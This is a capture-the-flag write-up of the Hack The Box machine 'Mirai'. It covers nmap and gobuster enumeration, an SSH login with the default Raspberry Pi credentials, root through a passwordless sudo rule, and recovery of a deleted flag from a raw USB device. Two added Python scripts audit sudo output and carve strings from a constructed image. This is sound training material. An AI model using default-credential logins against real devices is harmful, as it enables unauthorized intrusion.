Welcome to the Mirai writeup from HTB.
I hope you enjoy reading it. Any feedback is appreciated! @x4v1l0k


Mirai

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan for open ports.

$ nmap -p- -T4 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:19 CEST
Nmap scan report for 10.10.10.48
Host is up (0.096s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1536/tcp  open  ampr-inter
32400/tcp open  plex
32469/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 61.16 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,53,80,1536,32400,32469 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:21 CEST
Nmap scan report for 10.10.10.48
Host is up (0.095s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1536/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   96.63 ms 10.10.14.1
2   96.80 ms 10.10.10.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.90 seconds

Port 80

The web server on port 80 seems empty, so we are going to brute-force directories.

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,zip,rar,tar,bak,php
[+] Timeout:        10s
===============================================================
2021/05/07 16:54:21 Starting gobuster
===============================================================
/admin (Status: 301)
/versions (Status: 200)
===============================================================
2021/05/07 16:59:07 Finished
===============================================================

Well, inside the admin directory we find a Pi-hole installation. Let's enumerate that directory too.

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/admin/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48/admin/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip,rar,tar,bak
[+] Timeout:        10s
===============================================================
2021/05/07 16:56:04 Starting gobuster
===============================================================
/LICENSE (Status: 200)
/api.php (Status: 200)
/debug.php (Status: 200)
/help.php (Status: 200)
/img (Status: 301)
/index.php (Status: 200)
/list.php (Status: 200)
/queries.php (Status: 200)
/scripts (Status: 301)
/settings.php (Status: 200)
/style (Status: 301)
===============================================================
2021/05/07 17:00:51 Finished
===============================================================

I don't find anything interesting... We have seen that DNS port 53 is open, but neither the Pi-hole web interface we found nor the web service on port 32400 revealed any domain name, so we are going to add the domain mirai.htb to our /etc/hosts file and try accessing port 80 again.

This time we find a message telling us that this domain is restricted.

<script src="http://pi.hole/admin/scripts/pi-hole/js/queryads.js"></script>

But if we look at the page source we find a line that references the pi.hole domain, so we are going to change the mirai.htb entry in our hosts file to pi.hole.

And when accessing that domain... Surprise! We land on the same Pi-hole installation we had already found! 😂

After looking around and enumerating for a long time without finding anything, and knowing that Pi-hole is normally a Raspberry Pi installation, we can look up the default SSH credentials for a Raspberry Pi and test whether they work.

And in this official post they indicate that the default user is pi and the password is raspberry.

Exploitation

SSH

Testing with these credentials, we are in...

$ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

[email protected]:~ $ ls
background.jpg  Desktop  Documents  Downloads  Music  oldconffiles  Pictures  Public  python_games  Templates  Videos
[email protected]:~ $ cd Desktop/
[email protected]:~/Desktop $ ls
Plex  user.txt
[email protected]:~/Desktop $ cat user.txt 
CENSORED_FLAG

Post exploitation

Privilege escalation: pi to root

Sudo

[email protected]:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
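The two privilege lines above grant the pi user any command as root, the second one without even a password prompt. As an added example (not part of the original writeup), the following script parses `sudo -l` output and labels each entry so the unrestricted ones stand out in an audit. SAMPLE_SUDO_L reproduces the output shown above as a constructed string so the script runs offline; the severity labels are my own convention.

```python
"""Audit `sudo -l` output for entries that amount to unrestricted root.

Added example, not from the writeup. SAMPLE_SUDO_L is the output shown
above, embedded as a constructed string; the labels (CRITICAL/HIGH/INFO)
are an assumption of this script, not sudo terminology.
"""
import re

SAMPLE_SUDO_L = r"""Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

# A privilege line looks like:  (runas_user[ : runas_group]) [TAG: ...] command
_ENTRY = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_sudo_l(output: str) -> list:
    """Return (runas, tags, command) triples from the 'may run' section."""
    entries = []
    in_cmds = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_cmds = True          # everything after this header is a privilege line
            continue
        if not in_cmds:
            continue                # skip the Defaults block
        m = _ENTRY.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            entries.append((m.group("runas").strip(), tags, m.group("cmd")))
    return entries


def audit(output: str) -> list:
    """Label every entry; a command of 'ALL' means any program as the runas user."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        if cmd == "ALL" and "NOPASSWD" in tags:
            level = "CRITICAL"      # full root, no password prompt at all
        elif cmd == "ALL":
            level = "HIGH"          # full root, but the user's password is required
        else:
            level = "INFO"          # scoped to a specific command; review it separately
        findings.append((level, runas, tags, cmd))
    return findings


if __name__ == "__main__":
    for level, runas, tags, cmd in audit(SAMPLE_SUDO_L):
        print(f"{level:8} ({runas}) {' '.join(t + ':' for t in tags)} {cmd}".replace("  ", " "))
```

Feed it the real output of `sudo -l` on a host (or run the parser over `sudo -l -U user` for each account) and anything labelled CRITICAL is a passwordless path to root that should be scoped to the specific commands the account actually needs.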

Really? Root directly? I hope not!

[email protected]:~/Desktop $ sudo su
[email protected]:/home/pi/Desktop# cd /root
[email protected]:~# ls
root.txt
[email protected]:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

Oh! Yes, we are root, but we still have to find the flag! That's good!

Finding root flag

By listing the storage devices we can see that there is a second disk, sdb.

[email protected]:~# ls /dev/sd*
/dev/sda  /dev/sda1  /dev/sda2  /dev/sdb

Checking the mounts, we can see that the device is mounted read-only on /media/usbstick.

[email protected]:~# mount | grep sdb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)

Let's see what it contains.

[email protected]:~# cd /media/usbstick/
[email protected]:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
[email protected]:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Have you deleted my flag? Clumsy...
Let's try to get it back.

[email protected]:~# grep -a -C 500 'root.txt' /dev/sdb > /tmp/recover
[email protected]:~# strings /tmp/recover
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
CENSORED_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Now, among the strings it returns, we have the root flag.
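The recovery works because deleting a file on ext4 only unlinks it from its directory: the data blocks stay on disk, readable from the raw device, until something overwrites them, which is why grepping /dev/sdb for a nearby marker surfaces the contents. As an added example (not from the writeup), the script below does in Python what `grep -a -C 500 'root.txt' /dev/sdb | strings` did above: carve a window around every hit of a marker and list the printable strings in it. FAKE_DEVICE is a constructed byte string imitating leftover directory entries and an unlinked data block; it is not a real filesystem image and the flag value is a placeholder.

```python
"""Carve the neighbourhood of a known marker out of a raw device image and
list the printable strings in it (what grep -a -C ... | strings does).

Added example, not from the writeup. FAKE_DEVICE is a constructed stand-in
for /dev/sdb; the flag value is a placeholder.
"""
import re

# Non-printable filler (every byte >= 0x80) standing in for filesystem metadata.
NOISE = bytes(0x80 + (i % 0x7F) for i in range(256))

FAKE_DEVICE = (
    NOISE
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"   # stale dir entries
    + NOISE[::-1]
    + b"FLAG{constructed_placeholder}\n"                                # unlinked data block
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + NOISE
)


def carve_context(image: bytes, marker: bytes, window: int = 512) -> list:
    """Return `window` bytes before and after every occurrence of `marker`.

    Mirrors grep's -C: hits are found in the raw bytes, so blocks that no
    inode references any more are still searched.
    """
    hits = []
    start = 0
    while True:
        idx = image.find(marker, start)
        if idx == -1:
            return hits
        lo = max(0, idx - window)
        hi = min(len(image), idx + len(marker) + window)
        hits.append(image[lo:hi])
        start = idx + 1


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -n min_len`: runs of printable ASCII."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def recover_strings(image: bytes, marker: bytes, window: int = 512) -> list:
    """Unique printable strings found near `marker`, in order of appearance."""
    seen = []
    for chunk in carve_context(image, marker, window):
        for s in printable_strings(chunk):
            if s not in seen:
                seen.append(s)
    return seen


if __name__ == "__main__":
    for line in recover_strings(FAKE_DEVICE, b"root.txt"):
        print(line)
```

On a real device you would read the block device into `image` (or stream it in chunks that overlap by at least `window` bytes) rather than hold it in memory; the lesson for defenders is the same either way: data on a disk that was "deleted" rather than securely wiped or encrypted remains recoverable by anyone who can read the raw device.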